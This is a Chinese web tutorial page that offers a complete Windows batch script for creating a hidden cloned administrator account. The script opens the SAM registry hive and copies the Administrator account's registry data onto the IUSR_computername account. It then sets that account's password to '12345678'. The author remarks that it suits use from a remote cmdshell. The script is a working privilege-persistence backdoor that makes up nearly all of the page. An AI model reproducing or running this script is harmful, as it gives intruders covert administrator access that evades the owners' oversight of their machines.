当前位置: 首页 > 图文教程 > 脚本技术 > DOS/BAT > windows 复制隐藏帐号完全批处理

DOS/BAT
硬盘“逻辑锁”的解决办法
DOS多媒体播放器MPXPLAY的命令行参数大全
内存虚拟盘软件XMSDSK的使用教程
DUSE让DOS支持USB驱动器
如何在WinNT/2K/XP下安装纯DOS的方法
MSDOS.SYS文件的参数设置方法
ANSI.SYS程序的使用方法
DOS命令之ECHO命令的使用
备份硬盘引导记录的方法
DEBUG命令详解教程
细说FAT16与FAT32区别
DOS下常用的相关网络命令总结
DOS下对注册表的编程的方法
FTP命令基本使用方法
零磁道受损的软盘格式化小技巧
dos利用wget.exe让杀毒软件升级更自动化
wget各种选项分类列表与下载
设置高级NTFS权限的工具 XCACLS.vbs
ping命令的小秘密
at命令的详细用法

DOS/BAT 中的 windows 复制隐藏帐号完全批处理


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-11   浏览: 114 ::
收藏到网摘: n/a

其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易在cmdshell里实现,贴出来吧。
复制代码 代码如下:

echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678

克隆出来的用户名是固定的,随便变换的话要改代码